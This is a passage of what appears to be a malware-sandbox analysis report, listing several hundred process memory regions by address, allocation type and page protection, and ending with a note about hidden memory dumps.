trusted library allocation
|
page read and write
|
||
|
8725000
|
heap
|
page read and write
|
||
|
C676000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
82F0000
|
direct allocation
|
page read and write
|
||
|
272A8537000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
A9ED3FB000
|
stack
|
page read and write
|
||
|
8640000
|
direct allocation
|
page read and write
|
||
|
6AED000
|
stack
|
page read and write
|
||
|
25E0000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
272A8450000
|
heap
|
page read and write
|
||
|
888A000
|
heap
|
page read and write
|
||
|
A876000
|
direct allocation
|
page execute and read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
A9ECF26000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
2728E6A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
2728E6C0000
|
heap
|
page readonly
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
81E0000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
70E000
|
stack
|
page read and write
|
||
|
8690000
|
direct allocation
|
page read and write
|
||
|
818E000
|
stack
|
page read and write
|
||
|
272908EB000
|
trusted library allocation
|
page read and write
|
||
|
7EAB000
|
stack
|
page read and write
|
||
|
86B0000
|
direct allocation
|
page read and write
|
||
|
6EC4000
|
heap
|
page read and write
|
||
|
A9ED677000
|
stack
|
page read and write
|
||
|
2728E5B3000
|
heap
|
page read and write
|
||
|
6D5F000
|
stack
|
page read and write
|
||
|
6A2D000
|
stack
|
page read and write
|
||
|
A7D000
|
stack
|
page read and write
|
||
|
8360000
|
direct allocation
|
page read and write
|
||
|
25F0000
|
direct allocation
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page execute and read and write
|
||
|
A9ED37E000
|
stack
|
page read and write
|
||
|
7C0D000
|
stack
|
page read and write
|
||
|
7100000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
A9ED47F000
|
stack
|
page read and write
|
||
|
A9ED57C000
|
stack
|
page read and write
|
||
|
2998000
|
trusted library allocation
|
page read and write
|
||
|
6FC0000
|
trusted library allocation
|
page read and write
|
||
|
2729067C000
|
trusted library allocation
|
page read and write
|
||
|
2728E390000
|
heap
|
page read and write
|
||
|
272908DD000
|
trusted library allocation
|
page read and write
|
||
|
770000
|
trusted library section
|
page read and write
|
||
|
2728E54C000
|
heap
|
page read and write
|
||
|
23FA0000
|
remote allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
845000
|
trusted library allocation
|
page execute and read and write
|
||
|
692E000
|
stack
|
page read and write
|
||
|
2C5E000
|
stack
|
page read and write
|
||
|
2729222F000
|
trusted library allocation
|
page read and write
|
||
|
8959000
|
heap
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
24C0000
|
heap
|
page read and write
|
||
|
23FA0000
|
remote allocation
|
page read and write
|
||
|
86A0000
|
direct allocation
|
page read and write
|
||
|
70ED000
|
stack
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
A827000
|
trusted library allocation
|
page read and write
|
||
|
2C0E000
|
unkown
|
page read and write
|
||
|
A9ED777000
|
stack
|
page read and write
|
||
|
6F98000
|
trusted library allocation
|
page read and write
|
||
|
242C0000
|
heap
|
page read and write
|
||
|
6AAE000
|
stack
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
3B96000
|
remote allocation
|
page execute and read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
2A30000
|
heap
|
page execute and read and write
|
||
|
27290B54000
|
trusted library allocation
|
page read and write
|
||
|
842000
|
trusted library allocation
|
page read and write
|
||
|
240ED000
|
stack
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
7FAA000
|
heap
|
page read and write
|
||
|
272A8890000
|
heap
|
page read and write
|
||
|
7C70000
|
heap
|
page read and write
|
||
|
AC0000
|
heap
|
page read and write
|
||
|
A9ECFEF000
|
stack
|
page read and write
|
||
|
27290451000
|
trusted library allocation
|
page read and write
|
||
|
A9ECFAE000
|
stack
|
page read and write
|
||
|
814000
|
trusted library allocation
|
page read and write
|
||
|
272A8800000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
2540000
|
direct allocation
|
page read and write
|
||
|
272A8888000
|
heap
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B967000
|
trusted library allocation
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
2406C000
|
stack
|
page read and write
|
||
|
272A8491000
|
heap
|
page read and write
|
||
|
2422E000
|
stack
|
page read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
7F52000
|
heap
|
page read and write
|
||
|
86E0000
|
direct allocation
|
page read and write
|
||
|
2728E5EE000
|
heap
|
page read and write
|
||
|
2729220C000
|
trusted library allocation
|
page read and write
|
||
|
7F0000
|
trusted library section
|
page read and write
|
||
|
7CE000
|
stack
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
272A8810000
|
heap
|
page read and write
|
||
|
8906000
|
heap
|
page read and write
|
||
|
272921E8000
|
trusted library allocation
|
page read and write
|
||
|
272A87DF000
|
heap
|
page read and write
|
||
|
88B4000
|
heap
|
page read and write
|
||
|
2A50000
|
trusted library allocation
|
page read and write
|
||
|
436E000
|
stack
|
page read and write
|
||
|
23FA0000
|
remote allocation
|
page read and write
|
||
|
8940000
|
heap
|
page read and write
|
||
|
7F0E000
|
stack
|
page read and write
|
||
|
2728E606000
|
heap
|
page read and write
|
||
|
6EB4000
|
heap
|
page read and write
|
||
|
83A000
|
trusted library allocation
|
page execute and read and write
|
||
|
88EE000
|
heap
|
page read and write
|
||
|
44E1000
|
trusted library allocation
|
page read and write
|
||
|
813000
|
trusted library allocation
|
page execute and read and write
|
||
|
272900D0000
|
heap
|
page execute and read and write
|
||
|
2728E540000
|
heap
|
page read and write
|
||
|
44C0000
|
heap
|
page execute and read and write
|
||
|
272A8836000
|
heap
|
page read and write
|
||
|
A9EE54B000
|
stack
|
page read and write
|
||
|
6FD0000
|
heap
|
page execute and read and write
|
||
|
68EB000
|
stack
|
page read and write
|
||
|
272A8690000
|
heap
|
page read and write
|
||
|
26BD0000
|
direct allocation
|
page read and write
|
||
|
3A0000
|
heap
|
page read and write
|
||
|
23DF0000
|
direct allocation
|
page read and write
|
||
|
8921000
|
heap
|
page read and write
|
||
|
2412E000
|
stack
|
page read and write
|
||
|
272922F6000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
6EF0000
|
heap
|
page read and write
|
||
|
2728E775000
|
heap
|
page read and write
|
||
|
272A880C000
|
heap
|
page read and write
|
||
|
6D92000
|
heap
|
page read and write
|
||
|
2556000
|
heap
|
page read and write
|
||
|
8959000
|
heap
|
page read and write
|
||
|
829000
|
trusted library allocation
|
page read and write
|
||
|
2728E777000
|
heap
|
page read and write
|
||
|
8310000
|
direct allocation
|
page read and write
|
||
|
272A888B000
|
heap
|
page read and write
|
||
|
A9EE44E000
|
stack
|
page read and write
|
||
|
2728E670000
|
trusted library allocation
|
page read and write
|
||
|
272904DD000
|
trusted library allocation
|
page read and write
|
||
|
272A889B000
|
heap
|
page read and write
|
||
|
82D0000
|
direct allocation
|
page read and write
|
||
|
6B70000
|
heap
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
8610000
|
direct allocation
|
page read and write
|
||
|
272A073A000
|
trusted library allocation
|
page read and write
|
||
|
54E1000
|
trusted library allocation
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
7C90000
|
trusted library allocation
|
page read and write
|
||
|
70F0000
|
trusted library allocation
|
page read and write
|
||
|
A3D000
|
stack
|
page read and write
|
||
|
2FDF000
|
unkown
|
page read and write
|
||
|
A9ED27E000
|
stack
|
page read and write
|
||
|
85FF000
|
stack
|
page read and write
|
||
|
34A000
|
stack
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
6D96000
|
remote allocation
|
page execute and read and write
|
||
|
800000
|
trusted library allocation
|
page read and write
|
||
|
6EF9000
|
heap
|
page read and write
|
||
|
2728E5F4000
|
heap
|
page read and write
|
||
|
8620000
|
direct allocation
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
824E000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
44AE000
|
stack
|
page read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
8940000
|
direct allocation
|
page execute and read and write
|
||
|
BC76000
|
direct allocation
|
page execute and read and write
|
||
|
27290894000
|
trusted library allocation
|
page read and write
|
||
|
8196000
|
remote allocation
|
page execute and read and write
|
||
|
788000
|
heap
|
page read and write
|
||
|
87F0000
|
heap
|
page read and write
|
||
|
828C000
|
stack
|
page read and write
|
||
|
27291A9A000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A40000
|
trusted library allocation
|
page execute and read and write
|
||
|
86F0000
|
direct allocation
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
2BC0000
|
heap
|
page read and write
|
||
|
272921F6000
|
trusted library allocation
|
page read and write
|
||
|
6FA0000
|
trusted library allocation
|
page read and write
|
||
|
696E000
|
stack
|
page read and write
|
||
|
7FB2000
|
heap
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
23E00000
|
direct allocation
|
page read and write
|
||
|
2A5D000
|
stack
|
page read and write
|
||
|
2550000
|
heap
|
page read and write
|
||
|
272A8667000
|
heap
|
page execute and read and write
|
||
|
44D0000
|
heap
|
page read and write
|
||
|
272A0749000
|
trusted library allocation
|
page read and write
|
||
|
7796000
|
remote allocation
|
page execute and read and write
|
||
|
8720000
|
heap
|
page read and write
|
||
|
8956000
|
heap
|
page read and write
|
||
|
8380000
|
direct allocation
|
page read and write
|
||
|
8600000
|
direct allocation
|
page read and write
|
||
|
2728E770000
|
heap
|
page read and write
|
||
|
6B60000
|
heap
|
page read and write
|
||
|
4596000
|
remote allocation
|
page execute and read and write
|
||
|
B4F000
|
stack
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
702E000
|
stack
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page read and write
|
||
|
81D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
71A0000
|
trusted library allocation
|
page read and write
|
||
|
272908EF000
|
trusted library allocation
|
page read and write
|
||
|
86C0000
|
direct allocation
|
page read and write
|
||
|
8660000
|
direct allocation
|
page read and write
|
||
|
D18000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
2728E795000
|
heap
|
page read and write
|
||
|
7DF4EE5C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
272921FA000
|
trusted library allocation
|
page read and write
|
||
|
7C20000
|
heap
|
page read and write
|
||
|
2AC3000
|
heap
|
page read and write
|
||
|
7F70000
|
heap
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
81D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2EC000
|
stack
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
2728E740000
|
heap
|
page execute and read and write
|
||
|
27290FE3000
|
trusted library allocation
|
page read and write
|
||
|
880000
|
heap
|
page readonly
|
||
|
242AE000
|
stack
|
page read and write
|
||
|
5509000
|
trusted library allocation
|
page read and write
|
||
|
6A6B000
|
stack
|
page read and write
|
||
|
272A8770000
|
heap
|
page read and write
|
||
|
B276000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
5996000
|
remote allocation
|
page execute and read and write
|
||
|
44D8000
|
heap
|
page read and write
|
||
|
272A84D9000
|
heap
|
page read and write
|
||
|
7E6C000
|
stack
|
page read and write
|
||
|
328000
|
stack
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
8300000
|
direct allocation
|
page read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
240AC000
|
stack
|
page read and write
|
||
|
241EC000
|
stack
|
page read and write
|
||
|
2ACF000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
A9EE5CB000
|
stack
|
page read and write
|
||
|
8700000
|
direct allocation
|
page read and write
|
||
|
870000
|
trusted library allocation
|
page read and write
|
||
|
4543000
|
trusted library allocation
|
page read and write
|
||
|
70AE000
|
stack
|
page read and write
|
||
|
44C5000
|
heap
|
page execute and read and write
|
||
|
24B0000
|
heap
|
page readonly
|
||
|
2728E470000
|
heap
|
page read and write
|
||
|
74E000
|
stack
|
page read and write
|
||
|
2E03000
|
heap
|
page read and write
|
||
|
2C90000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
272A8499000
|
heap
|
page read and write
|
||
|
A9ED7FE000
|
stack
|
page read and write
|
||
|
259F000
|
stack
|
page read and write
|
||
|
7FBA000
|
heap
|
page read and write
|
||
|
30DF000
|
stack
|
page read and write
|
||
|
27290DE0000
|
trusted library allocation
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
29EC000
|
stack
|
page read and write
|
||
|
82E0000
|
direct allocation
|
page read and write
|
||
|
6E80000
|
heap
|
page read and write
|
||
|
A9ED8F9000
|
stack
|
page read and write
|
||
|
3A60000
|
remote allocation
|
page execute and read and write
|
||
|
2728E6B0000
|
heap
|
page read and write
|
||
|
30B000
|
stack
|
page read and write
|
||
|
2728E556000
|
heap
|
page read and write
|
||
|
8A76000
|
direct allocation
|
page execute and read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
272A886F000
|
heap
|
page read and write
|
||
|
4DD4000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
direct allocation
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
272A8886000
|
heap
|
page read and write
|
||
|
4EEE000
|
trusted library allocation
|
page read and write
|
||
|
3ED000
|
stack
|
page read and write
|
||
|
7F4E000
|
stack
|
page read and write
|
||
|
8670000
|
direct allocation
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
2728E4D0000
|
heap
|
page read and write
|
||
|
86D0000
|
direct allocation
|
page read and write
|
||
|
8680000
|
direct allocation
|
page read and write
|
||
|
2401F000
|
stack
|
page read and write
|
||
|
A9ED4FE000
|
stack
|
page read and write
|
||
|
85A000
|
heap
|
page read and write
|
||
|
8630000
|
direct allocation
|
page read and write
|
||
|
82B0000
|
trusted library allocation
|
page read and write
|
||
|
7C6E000
|
stack
|
page read and write
|
||
|
23EAF000
|
stack
|
page read and write
|
||
|
9476000
|
direct allocation
|
page execute and read and write
|
||
|
71EC000
|
stack
|
page read and write
|
||
|
272908D3000
|
trusted library allocation
|
page read and write
|
||
|
A9ED2FD000
|
stack
|
page read and write
|
||
|
2A90000
|
heap
|
page read and write
|
||
|
8370000
|
direct allocation
|
page read and write
|
||
|
298E000
|
stack
|
page read and write
|
||
|
272919F8000
|
trusted library allocation
|
page read and write
|
||
|
23FDE000
|
stack
|
page read and write
|
||
|
2426D000
|
stack
|
page read and write
|
||
|
820000
|
trusted library allocation
|
page read and write
|
||
|
8320000
|
direct allocation
|
page read and write
|
||
|
27290100000
|
heap
|
page read and write
|
||
|
A9EE3CF000
|
stack
|
page read and write
|
||
|
5673000
|
trusted library allocation
|
page read and write
|
||
|
7FE4000
|
heap
|
page read and write
|
||
|
2728E790000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
253C000
|
stack
|
page read and write
|
||
|
69AD000
|
stack
|
page read and write
|
There are 446 hidden memdumps, click here to show them.